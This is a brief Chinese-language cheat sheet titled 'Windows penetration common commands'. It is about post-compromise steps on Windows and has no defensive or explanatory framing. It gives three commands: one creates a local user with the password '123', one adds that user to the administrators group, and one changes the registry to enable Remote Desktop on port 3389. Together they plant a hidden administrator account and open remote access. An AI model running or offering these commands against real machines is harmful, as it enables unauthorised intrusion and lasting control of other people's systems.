Windows渗透常用命令

Windows常用命令

1
2
3
4
5
6
//添加用户
net user name 123 /add
//添加到管理员组
net localgroup administrators name /add
//开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f